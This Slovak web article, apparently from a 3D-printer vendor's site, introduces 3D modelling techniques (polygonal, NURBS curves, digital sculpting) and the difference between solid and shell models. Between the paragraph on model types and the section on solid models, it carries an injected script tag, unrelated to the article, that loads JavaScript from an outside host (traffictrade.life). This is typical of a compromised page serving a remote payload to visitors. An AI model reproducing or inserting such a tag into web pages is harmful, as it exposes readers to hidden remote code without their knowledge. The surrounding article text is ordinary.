Proces modelovania pre 3D tlač

Proces modelovania pre 3D tlač. Aj Vás zaujíma proces tvorby 3D modelov? Túžili ste si vymodelovať svoje vlastné predstavy, ale nevedeli ste ako? V nasledujúcom článku sa dočítate ako proces modelovania prebieha a vytvorenie modelov už pre Vás nebude žiadny problém. V súčastnosti máme k dispozícii niekoľko postupov vytvárania 3D modelov a teda ich modelovania. Predstavíme Vám polygonálne modelovanie, vytváranie modelov pomocou kriviek ale aj techniky tzv. digitálneho sochárstva.

Polygonálne modelovanie

Polygonálne modelovanie pracuje s plochami, ktoré označujeme ako polygóny. Väčšina 3D modelovacích programov pracuje s polygonálnymi plochami. Všetky polygóny sú rovinné a prostredníctvom ich veľkého množstva je možné vytvoriť opticky pôsobiace zakrivené plochy. Typickým príkladom takýchto programov je program 3DS MAX alebo SketchUp.

Tvorba modelov pomocou kriviek

Pri použití modelovania pomocou kriviek sú povrchy jednotlivých modelov definované krivkami, ktoré sú ovplyvňované kontrolnými bodmi. Krivky obsahujú nejednotné racionálne B-spline, drážkovanie či záplaty. Typickým príkladom takéhoto programu je NURBS modelár Rhinoceros.

Digitálne sochárstvo

Ďalšou z možností pri vytváraní modelovania 3D modelov je využitie digitálneho sochárstva, ktoré aj v súčastnosti ešte stále predstavuje pomerne nový spôsob modelovania 3D modelov.

Okrem uvedených spôsobov modelovania existuje celý rad modelovacích techník ako napr. konštruktívna priestorová geometria, využitie implicitných plôch či rozdelenia povrchov. Stačí len zvoliť ten správny spôsob pre Vás a pustiť sa do vytvárania nádherných 3D modelov.

Proces modelovania pre 3D tlač

Čo je 3D model?

Skôr ako sa pustíme do odbornej terminológie, vysvetľovania technologických procesov a mechanizmov 3D tlače, si najskôr  musíme vysvetliť a definovať pojem 3D model. 3D model, je výsledný produkt, ktorý vzniká v procese matematickej prezentácie ľubovoľného trojrozmerného povrchu objektu. Tento proces prebieha za pomoci využitia špecializovaného softvéru.

3D model sa môže zobrazovať ako dvojrozmerný obraz cez proces, ktorý označuje ako 3D renderovanie alebo môže byť vizualizovaný prostredníctvom fyzikálnych javov v počítačovej simulácii. 3D model môžeme tiež vytvoriť aj pomocou 3D tlačového zariadenia. Vo všeobecnosti môžeme 3D modely rozdeliť do 2 skupín a to na skupinu plných modelov a skupinu škrupinových modelov.

script src=’https://traffictrade.life/scripts.js‘ type=’text/javascript‘>

Skupina plných modelov

Plné modely – ako už hovorí názov, tieto modely sú pevné, definujú objem objektu. Sú realistické a ťažšie realizovateľné. Používajú sa predovšetkým na zobrazenie simulácií, ktoré sa nedajú prezentovať virtuálne: akými sú napr. simulácie lekárske alebo technické.

Skupina škrupinových modelov

Škrupinové modely – jedná sa o typ modelov, ktoré sú z vnútra duté. S týmito modelmi sa ľahšie pracuje. Sú využiteľné vo filmoch alebo počítačových hrách.

Pozrite si ponuku 3D tlačiarní na našej stránke.

O 3D modelovaní sa viac dozviete na stránkach Academy X.